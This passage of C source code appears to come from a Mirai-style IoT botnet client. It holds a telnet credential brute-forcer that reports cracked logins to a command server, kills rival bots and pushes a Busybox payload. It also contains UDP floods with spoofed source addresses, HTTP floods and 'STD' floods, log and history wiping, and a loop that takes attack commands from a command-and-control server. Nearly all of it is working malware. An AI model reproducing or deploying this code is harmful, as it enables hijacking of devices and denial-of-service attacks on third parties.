2610. char *tmp = fds[i].sockbuf;
2611. memset(&(fds[i]), 0, sizeof(struct telstate_t));
2612. fds[i].sockbuf = tmp;
2613. fds[i].ip = MiraiIPRanges(); }
2614. else {
2615. fds[i].passwordInd++;
2616. fds[i].usernameInd++;
2617. if(fds[i].passwordInd == sizeof(Telnet_Passwords) / sizeof(char *)) {
2618. fds[i].complete = 1;
2619. continue; }
2620. if(fds[i].usernameInd == sizeof(Telnet_Usernames) / sizeof(char *)) {
2621. fds[i].complete = 1;
2622. continue;
2623. }
2624. }
2625. dest_addr.sin_family = AF_INET;
2626. dest_addr.sin_port = htons(23);
2627. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
2628. dest_addr.sin_addr.s_addr = fds[i].ip;
2629. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
2630. if(fds[i].fd == -1) continue;
2631. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
2632. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) {
2633. sclose(fds[i].fd);
2634. fds[i].complete = 1; }
2635. else {
2636. fds[i].state = 1;
2637. fds[i].tTimeout = 0;
2638. }
2639. }
2640. break;
2641. case 1: {
2642. FD_ZERO(&fdset);
2643. FD_SET(fds[i].fd, &fdset);
2644. tv.tv_sec = 0;
2645. tv.tv_usec = 10000;
2646. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
2647. if(res == 1) {
2648. lon = sizeof(int);
2649. valopt = 0;
2650. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
2651. if(valopt) {
2652. sclose(fds[i].fd);
2653. fds[i].state = 0;
2654. fds[i].complete = 1;
2655. } else {
2656. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
2657. fds[i].tTimeout = 0;
2658. fds[i].bufUsed = 0;
2659. memset(fds[i].sockbuf, 0, 256);
2660. fds[i].state = 2;
2661. } continue; }
2662. else if(res == -1) {
2663. sclose(fds[i].fd);
2664. fds[i].state = 0;
2665. fds[i].complete = 1;
2666. continue; }
2667. if(fds[i].tTimeout + 6 < time(NULL)) {
2668. sclose(fds[i].fd);
2669. fds[i].state = 0;
2670. fds[i].complete = 1;
2671. }
2672. }
2673. break;
2674. case 2: {
2675. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances)) {
2676. if(contains_fail(fds[i].sockbuf)) {
2677. fds[i].state = 0;
2678. } else {
2679. fds[i].state = 3; }
2680. continue; }
2681. if(fds[i].tTimeout + 6 < time(NULL)) {
2682. fds[i].state = 0;
2683. fds[i].complete = 1;
2684. }
2685. }
2686. break;
2687. case 3: {
2688. if(send(fds[i].fd, Telnet_Usernames[fds[i].usernameInd], strlen(Telnet_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) {
2689. fds[i].state = 0;
2690. fds[i].complete = 1;
2691. continue; }
2692. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
2693. fds[i].state = 0;
2694. fds[i].complete = 1;
2695. continue; }
2696. fds[i].state = 4; }
2697. break;
2698. case 4: {
2699. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances))
2700. {
2701. if(contains_fail(fds[i].sockbuf)) {
2702. fds[i].state = 0;
2703. } else {
2704. fds[i].state = 5; }
2705. continue; }
2706. if(fds[i].tTimeout + 6 < time(NULL)) {
2707. fds[i].state = 0;
2708. fds[i].complete = 1;
2709. }
2710. }
2711. break;
2712. case 5: {
2713. if(send(fds[i].fd, Telnet_Passwords[fds[i].passwordInd], strlen(Telnet_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) {
2714. fds[i].state = 0;
2715. fds[i].complete = 1;
2716. continue; }
2717. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
2718. fds[i].state = 0;
2719. fds[i].complete = 1;
2720. continue; }
2721. fds[i].state = 6;
2722. }
2723. break;
2724. case 6: {
2725. if (read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances2)) {
2726. fds[i].tTimeout = time(NULL);
2727. if (contains_fail(fds[i].sockbuf)) {
2728. fds[i].state = 0;
2729. } else {
2730. sockprintf(mainCommSock, "[ MIRAI ] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2731. sockprintf(mainCommSock, "REPORT %s:%s:%s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2732. fds[i].state = 7;
2733. } continue; }
2734. if (fds[i].tTimeout + 6 < time(NULL)) {
2735. fds[i].state = 0;
2736. fds[i].complete = 1;
2737. }
2738. }
2739. break;
2740. case 7: {
2741. char RemoveTheTempDirs [80];
2742. sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
2743. if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
2744. RemoveTempDirs();
2745. sockprintf(mainCommSock, "[ MIRAI ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2746. char killtheproccesses[80];
2747. sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
2748. if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
2749. sockprintf(mainCommSock, "[ MIRAI ] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
2750. if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) {
2751. fds[i].state = 0;
2752. fds[i].complete = 1;
2753. continue; }
2754. fds[i].state = 8;
2755. }
2756. break;
2757. case 8: {
2758. fds[i].tTimeout = time(NULL);
2759. if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) {
2760. sclose(fds[i].fd);
2761. fds[i].state = 0;
2762. fds[i].complete = 1;
2763. continue; }
2764. fds[i].complete = 3;
2765. if(fds[i].tTimeout + 60 < time(NULL)) {
2766. if(fds[i].complete !=3){
2767. }
2768. fds[i].state = 0;
2769. fds[i].complete = 1;
2770. }
2771. break;
2772. }
2773. }
2774. }
2775. }
2776. }
2777. void SendSTD(unsigned char *ip, int port, int secs) {
2778. int iSTD_Sock;
2779. iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0);
2780. time_t start = time(NULL);
2781. struct sockaddr_in sin;
2782. struct hostent *hp;
2783. hp = gethostbyname(ip);
2784. bzero((char*) &sin,sizeof(sin));
2785. bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
2786. sin.sin_family = hp->h_addrtype;
2787. sin.sin_port = port;
2788. unsigned int a = 0;
2789. while(1){
2790. if (a >= 50) {
2791. send(iSTD_Sock, "std", 69, 0);
2792. connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin));
2793. if (time(NULL) >= start + secs) {
2794. close(iSTD_Sock);
2795. _exit(0);
2796. }
2797. a = 0;
2798. }
2799. a++;
2800. }
2801. }
2802. void SendUDP(unsigned char *target, int port, int timeEnd, int packetsize, int pollinterval, int spoofit) {
2803. struct sockaddr_in dest_addr;
2804. dest_addr.sin_family = AF_INET;
2805. if(port == 0) dest_addr.sin_port = rand_cmwc();
2806. else dest_addr.sin_port = htons(port);
2807. if(getHost(target, &dest_addr.sin_addr)) return;
2808. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
2809. register unsigned int pollRegister;
2810. pollRegister = pollinterval;
2811. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
2812. if(!sockfd) {
2813. return;
2814. }
2815. int tmp = 1;
2816. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) {
2817. return;
2818. }
2819. int counter = 50;
2820. while(counter--) {
2821. srand(time(NULL) ^ rand_cmwc());
2822. init_rand(rand());
2823. }
2824. in_addr_t netmask;
2825. netmask = ( ~((1 << (32 - spoofit)) - 1) );
2826. unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize];
2827. struct iphdr *iph = (struct iphdr *)packet;
2828. struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
2829. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize);
2830. udph->len = htons(sizeof(struct udphdr) + packetsize);
2831. udph->source = rand_cmwc();
2832. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
2833. udph->check = 0;
2834. makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize);
2835. iph->check = csum ((unsigned short *) packet, iph->tot_len);
2836. int end = time(NULL) + timeEnd;
2837. register unsigned int i = 0;
2838. while(1) {
2839. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
2840. udph->source = rand_cmwc();
2841. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
2842. iph->id = rand_cmwc();
2843. iph->saddr = htonl( getRandomIP(netmask) );
2844. iph->check = csum ((unsigned short *) packet, iph->tot_len);
2845. if(i == pollRegister) {
2846. if(time(NULL) > end) break;
2847. i = 0;
2848. continue;
2849. }
2850. i++;
2851. }
2852. }
2853. int socket_connect(char *host, in_port_t port) {
2854. struct hostent *hp;
2855. struct sockaddr_in addr;
2856. int on = 1, sock;
2857. if ((hp = gethostbyname(host)) == NULL) return 0;
2858. bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
2859. addr.sin_port = htons(port);
2860. addr.sin_family = AF_INET;
2861. sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
2862. setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
2863. if (sock == -1) return 0;
2864. if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1) return 0;
2865. return sock;
2866. }
2867. void SendHTTP(char *method, char *host, in_port_t port, char *path, int timeEnd, int power) {
2868. int socket, i, end = time(NULL) + timeEnd, sendIP = 0;
2869. char request[512], buffer[1];
2870. for (i = 0; i < power; i++) {
2871. sprintf(request, "%s %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n", method, path, host, useragents[(rand() % 36)]);
2872. if (fork()) {
2873. while (end > time(NULL)) {
2874. socket = socket_connect(host, port);
2875. if (socket != 0) {
2876. write(socket, request, strlen(request));
2877. read(socket, buffer, 1);
2878. close(socket);
2879. }
2880. }
2881. exit(0);
2882. }
2883. }
2884. }
2885. void ClearHistory()
2886. {
2887. system("history -c;history -w");
2888. system("cd /;rm -rf ~/.bash_history");
2889. }
2890. void processCmd(int argc, unsigned char *argv[]) {
2891. if(!strcmp(argv[0], "TELNET"))
2892. {
2893. if(!strcmp(argv[1], "ON"))
2894. {
2895. uint32_t parent;
2896. parent = fork();
2897. int ii = 0;
2898. int forks = sysconf( _SC_NPROCESSORS_ONLN );
2899. int fds = 999999;
2900. if(forks == 1) fds = 500;
2901. if(forks >= 2) fds = 1000;
2902. if (parent > 0)
2903. {
2904. scanPid = parent;
2905. return;
2906. }
2907. else if(parent == -1) return;
2908. for (ii = 0; ii < forks; ii++)
2909. {
2910. srand((time(NULL) ^ getpid()) + getppid());
2911. init_rand(time(NULL) ^ getpid());
2912. TelnetScanner(100, fds);
2913. _exit(0);
2914. }
2915. }
2916. if(!strcmp(argv[1], "OFF"))
2917. {
2918. if(scanPid == 0) return;
2919. kill(scanPid, 9);
2920. scanPid = 0;
2921. }
2922. if(!strcmp(argv[1], "FASTLOAD"))
2923. {
2924. int threads = atoi(argv[1]);
2925. int usec = atoi(argv[2]);
2926. if(!listFork())
2927. {
2928. //sockprintf(mainCommSock, "[TELNET] Starting Fastload.");
2929. TelnetScanner(usec, threads);
2930. _exit(0);
2931. }
2932. return;
2933. }
2934. }
2935. if(!strcmp(argv[0], "MIRAI"))
2936. {
2937. if(!strcmp(argv[1], "ON"))
2938. {
2939. uint32_t parent;
2940. parent = fork();
2941. int ii = 0;
2942. int forks = sysconf( _SC_NPROCESSORS_ONLN );
2943. int fds = 999999;
2944. if(forks == 1) fds = 500;
2945. if(forks >= 2) fds = 1000;
2946. if (parent > 0)
2947. {
2948. miraiPid = parent;
2949. return;
2950. }
2951. else if(parent == -1) return;
2952. for (ii = 0; ii < forks; ii++)
2953. {
2954. srand((time(NULL) ^ getpid()) + getppid());
2955. init_rand(time(NULL) ^ getpid());
2956. MiraiScanner(100, fds);
2957. _exit(0);
2958. }
2959. }
2960. if(!strcmp(argv[1], "OFF"))
2961. {
2962. if(miraiPid == 0) return;
2963. kill(miraiPid, 9);
2964. miraiPid = 0;
2965. }
2966. if(!strcmp(argv[1], "FASTLOAD"))
2967. {
2968. int threads = atoi(argv[1]);
2969. int usec = atoi(argv[2]);
2970. if(!listFork())
2971. {
2972. //sockprintf(mainCommSock, "Starting scanner!!");
2973. MiraiScanner(usec, threads);
2974. _exit(0);
2975. }
2976. return;
2977. }
2978. }
2979. if(!strcmp(argv[0], "PHONE")) {
2980. if(argc != 2) {
2981. return; }
2982. if(!strcmp(argv[1], "OFF")) {
2983. if(Phonepid == 0) return;
2984. kill(Phonepid, 9);
2985. Phonepid = 0; }
2986. if(!strcmp(argv[1], "ON")) {
2987. if(Phonepid != 0) return;
2988. uint32_t parent;
2989. parent = fork();
2990. if (parent > 0) { Phonepid = parent; return;}
2991. else if(parent == -1) return;
2992. PhoneScanner();
2993. _exit(0);
2994. }
2995. }
2996. if(!strcmp(argv[0], "MIRAITEST")) {
2997. if(argc != 2) {
2998. return; }
2999. if(!strcmp(argv[1], "OFF")) {
3000. if(testmiraiPid == 0) return;
3001. kill(testmiraiPid, 9);
3002. testmiraiPid = 0; }
3003. if(!strcmp(argv[1], "ON")) {
3004. if(testmiraiPid != 0) return;
3005. uint32_t parent;
3006. parent = fork();
3007. if (parent > 0) { testmiraiPid = parent; return;}
3008. else if(parent == -1) return;
3009. MiraiHackaShit();
3010. _exit(0);
3011. }
3012. }
3013. if(!strcmp(argv[0], "TELNETTEST")) {
3014. if(argc != 2) {
3015. return; }
3016. if(!strcmp(argv[1], "OFF")) {
3017. if(testtelnetPid == 0) return;
3018. kill(testtelnetPid, 9);
3019. testtelnetPid = 0; }
3020. if(!strcmp(argv[1], "ON")) {
3021. if(testtelnetPid != 0) return;
3022. uint32_t parent;
3023. parent = fork();
3024. if (parent > 0) { testtelnetPid = parent; return;}
3025. else if(parent == -1) return;
3026. HackaShit();
3027. _exit(0);
3028. }
3029. }
3030. if(!strcmp(argv[0], "BCM")) {
3031. if(argc != 2) {
3032. return; }
3033. if(!strcmp(argv[1], "OFF")) {
3034. if(bcmPid == 0) return;
3035. kill(bcmPid, 9);
3036. bcmPid = 0; }
3037. if(!strcmp(argv[1], "ON")) {
3038. if(bcmPid != 0) return;
3039. uint32_t parent;
3040. parent = fork();
3041. if (parent > 0) { bcmPid = parent; return;}
3042. else if(parent == -1) return;
3043. BCMscanner();
3044. _exit(0);
3045. }
3046. }
3047.  
3048. if (!strcmp(argv[0], "HTTP"))
3049. {
3050. // !* HTTP METHOD TARGET PORT PATH TIME POWER
3051. // !* HTTP POST/GET/HEAD hackforums.net 80 / 10 100
3052. if (argc < 6 || atoi(argv[3]) < 1 || atoi(argv[5]) < 1) return;
3053. if (listFork()) return;
3054. SendHTTP(argv[1], argv[2], atoi(argv[3]), argv[4], atoi(argv[5]), atoi(argv[6]));
3055. exit(0);
3056. }
3057. if(!strcmp(argv[0], "UDP"))
3058. {
3059. // !* UDP TARGET PORT TIME PACKETSIZE POLLINTERVAL
3060. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[4]) > 1024 || (argc == 6 && atoi(argv[5]) < 1))
3061. {
3062. return;
3063. }
3064. unsigned char *ip = argv[1];
3065. int port = atoi(argv[2]);
3066. int time = atoi(argv[3]);
3067. int packetsize = atoi(argv[4]);
3068. int pollinterval = (argc == 6 ? atoi(argv[5]) : 10);
3069. int spoofed = 32;
3070. if(strstr(ip, ",") != NULL)
3071. {
3072. unsigned char *hi = strtok(ip, ",");
3073. while(hi != NULL)
3074. {
3075. if(!listFork())
3076. {
3077. SendUDP(hi, port, time, packetsize, pollinterval, spoofed);
3078. _exit(0);
3079. }
3080. hi = strtok(NULL, ",");
3081. }
3082. } else {
3083. if (listFork())
3084. {
3085. return;
3086. }
3087. SendUDP(ip, port, time, packetsize, pollinterval, spoofed);
3088. _exit(0);
3089. }
3090. }
3091. if(!strcmp(argv[0], "STD"))
3092. {
3093. //!* STD TARGET PORT TIME
3094. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
3095. {
3096. return;
3097. }
3098. unsigned char *ip = argv[1];
3099. int port = atoi(argv[2]);
3100. int time = atoi(argv[3]);
3101. if(strstr(ip, ",") != NULL)
3102. {
3103. unsigned char *hi = strtok(ip, ",");
3104. while(hi != NULL)
3105. {
3106. if(!listFork())
3107. {
3108. SendSTD(hi, port, time);
3109. _exit(0);
3110. }
3111. hi = strtok(NULL, ",");
3112. }
3113. } else {
3114. if (listFork())
3115. {
3116. return;
3117. }
3118. SendSTD(ip, port, time);
3119. _exit(0);
3120. }
3121. }
3122. if(!strcmp(argv[0], "KILLATTK"))
3123. {
3124. int killed = 0;
3125. unsigned long i;
3126. for (i = 0; i < numpids; i++)
3127. {
3128. if (pids[i] != 0 && pids[i] != getpid())
3129. {
3130. kill(pids[i], 9);
3131. killed++;
3132. }
3133. }
3134. if(killed > 0)
3135. {
3136. //
3137. } else {
3138. //
3139. }
3140. }
3141. if(!strcmp(argv[0], "LOLNOGTFO"))
3142. {
3143. exit(0);
3144. }
3145. if(!strcmp(argv[0], "UPDATE"))
3146. {
3147. RemoveTempDirs();
3148. sockprintf(mainCommSock, "[Updating] [%s:%s]", getBuild(), getEndianness());
3149. }
3150. }
3151. int initConnection() {
3152. unsigned char server[4096];
3153. memset(server, 0, 4096);
3154. if(mainCommSock) { close(mainCommSock); mainCommSock = 0; }
3155. if(mainCommSock + 1 == SERVER_LIST_SIZE) mainCommSock = 0;
3156. else mainCommSock++;
3157. strcpy(server, Busybox_Payload[mainCommSock]);
3158. int port = Server_Botport;
3159. if(strchr(server, ':') != NULL) {
3160. port = atoi(strchr(server, ':') + 1);
3161. *((unsigned char *)(strchr(server, ':'))) = 0x0; }
3162. mainCommSock = socket(AF_INET, SOCK_STREAM, 0);
3163. if(!connectTimeout(mainCommSock, server, port, 30)) return 1;
3164. return 0;
3165. }
3166. void UpdateNameSrvs() {
3167. uint16_t fhandler = open("/etc/resolv.conf", O_WRONLY | O_TRUNC);
3168. if (access("/etc/resolv.conf", F_OK) != -1) {
3169. const char* resd = "nameserver 8.8.8.8\nnameserver 8.8.4.4\n";
3170. size_t resl = strlen(resd);
3171. write(fhandler, resd, resl);
3172. } else { return; }
3173. close(fhandler);
3174. }
3175. void RemoveTempDirs() {
3176. system("rm -rf /tmp/* /var/* /var/run/* /var/tmp/*");
3177. system("rm -rf /var/log/wtmp");
3178. system("rm -rf ~/.bash_history");
3179. system("history -c;history -w");
3180. }
3181. int getEndianness(void)
3182. {
3183. union
3184. {
3185. uint32_t vlu;
3186. uint8_t data[sizeof(uint32_t)];
3187. } nmb;
3188. nmb.data[0] = 0x00;
3189. nmb.data[1] = 0x01;
3190. nmb.data[2] = 0x02;
3191. nmb.data[3] = 0x03;
3192. switch (nmb.vlu)
3193. {
3194. case UINT32_C(0x00010203):
3195. return "BIG_ENDIAN";
3196. case UINT32_C(0x03020100):
3197. return "LITTLE_ENDIAN";
3198. case UINT32_C(0x02030001):
3199. return "BIG_ENDIAN_W";
3200. case UINT32_C(0x01000302):
3201. return "LITTLE_ENDIAN_W";
3202. default:
3203. return "UNKNOWN";
3204. }
3205. }
3206. int getOurIP() {
3207. int sock = socket(AF_INET, SOCK_DGRAM, 0);
3208. if(sock == -1) return 0;
3209. struct sockaddr_in serv;
3210. memset(&serv, 0, sizeof(serv));
3211. serv.sin_family = AF_INET;
3212. serv.sin_addr.s_addr = inet_addr("8.8.8.8");
3213. serv.sin_port = htons(53);
3214. int err = connect(sock, (const struct sockaddr*) &serv, sizeof(serv));
3215. if(err == -1) return 0;
3216. struct sockaddr_in name;
3217. socklen_t namelen = sizeof(name);
3218. err = getsockname(sock, (struct sockaddr*) &name, &namelen);
3219. if(err == -1) return 0;
3220. ourIP.s_addr = name.sin_addr.s_addr;
3221. int cmdline = open("/proc/net/route", O_RDONLY);
3222. char linebuf[4096];
3223. while(fdgets(linebuf, 4096, cmdline) != NULL)
3224. {
3225. if(strstr(linebuf, "\t00000000\t") != NULL)
3226. {
3227. unsigned char *pos = linebuf;
3228. while(*pos != '\t') pos++;
3229. *pos = 0;
3230. break;
3231. }
3232. memset(linebuf, 0, 4096);
3233. }
3234. close(cmdline);
3235. if(*linebuf)
3236. {
3237. int i;
3238. struct ifreq ifr;
3239. strcpy(ifr.ifr_name, linebuf);
3240. ioctl(sock, SIOCGIFHWADDR, &ifr);
3241. for (i=0; i<6; i++) macAddress[i] = ((unsigned char*)ifr.ifr_hwaddr.sa_data)[i];
3242. }
3243. close(sock);
3244. }
3245. int main(int argc, unsigned char *argv[]) {
3246. const char *lolsuckmekid = "";
3247. if(SERVER_LIST_SIZE <= 0) return 0;
3248. strncpy(argv[0],"",strlen(argv[0]));
3249. argv[0] = "";
3250. prctl(PR_SET_NAME, (unsigned long) lolsuckmekid, 0, 0, 0);
3251. srand(time(NULL) ^ getpid());
3252. init_rand(time(NULL) ^ getpid());
3253. pid_t pid1;
3254. pid_t pid2;
3255. int status;
3256. getOurIP();
3257. if (pid1 = fork()) {
3258. waitpid(pid1, &status, 0);
3259. exit(0);
3260. } else if (!pid1) {
3261. if (pid2 = fork()) {
3262. exit(0);
3263. } else if (!pid2) {
3264. } else {
3265. }
3266. } else {
3267. }
3268. chdir("/");
3269. setuid(0);
3270. seteuid(0);
3271. signal(SIGPIPE, SIG_IGN);
3272. while(1) {
3273. if(fork() == 0) {
3274. if(initConnection()) { sleep(5); continue; }
3275. sockprintf(mainCommSock, "[ CONNECTED ] IP: %s || Arch Type: %s || Endianness Type: %s", inet_ntoa(ourIP), getBuild(), getEndianness());
3276. UpdateNameSrvs();
3277. RemoveTempDirs();
3278. char commBuf[4096];
3279. int got = 0;
3280. int i = 0;
3281. while((got = recvLine(mainCommSock, commBuf, 4096)) != -1) {
3282. for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
3283. unsigned int *newpids, on;
3284. for (on = i + 1; on < numpids; on++) pids[on-1] = pids[on];
3285. pids[on - 1] = 0;
3286. numpids--;
3287. newpids = (unsigned int*)malloc((numpids + 1) * sizeof(unsigned int));
3288. for (on = 0; on < numpids; on++) newpids[on] = pids[on];
3289. free(pids);
3290. pids = newpids;
3291. }
3292. commBuf[got] = 0x00;
3293. trim(commBuf);
3294. if(strstr(commBuf, "PING") == commBuf) { // PING
3295. continue;
3296. }
3297. if(strstr(commBuf, "DUP") == commBuf) exit(0); // DUP
3298. unsigned char *message = commBuf;
3299. if(*message == '!') {
3300. unsigned char *nickMask = message + 1;
3301. while(*nickMask != ' ' && *nickMask != 0x00) nickMask++;
3302. if(*nickMask == 0x00) continue;
3303. *(nickMask) = 0x00;
3304. nickMask = message + 1;
3305. message = message + strlen(nickMask) + 2;
3306. while(message[strlen(message) - 1] == '\n' || message[strlen(message) - 1] == '\r') message[strlen(message) - 1] = 0x00;
3307. unsigned char *command = message;
3308. while(*message != ' ' && *message != 0x00) message++;
3309. *message = 0x00;
3310. message++;
3311. unsigned char *tmpcommand = command;
3312. while(*tmpcommand) { *tmpcommand = toupper(*tmpcommand); tmpcommand++; }
3313. unsigned char *params[10];
3314. int paramsCount = 1;
3315. unsigned char *pch = strtok(message, " ");
3316. params[0] = command;
3317. while(pch) {
3318. if(*pch != '\n') {
3319. params[paramsCount] = (unsigned char *)malloc(strlen(pch) + 1);
3320. memset(params[paramsCount], 0, strlen(pch) + 1);
3321. strcpy(params[paramsCount], pch);
3322. paramsCount++;
3323. }
3324. pch = strtok(NULL, " ");
3325. }
3326. processCmd(paramsCount, params);
3327. if(paramsCount > 1) {
3328. int q = 1;
3329. for(q = 1; q < paramsCount; q++) {
3330. free(params[q]);
3331. }
3332. }
3333. }
3334. }
3335. }
3336. return 0;
3337. }
3338. }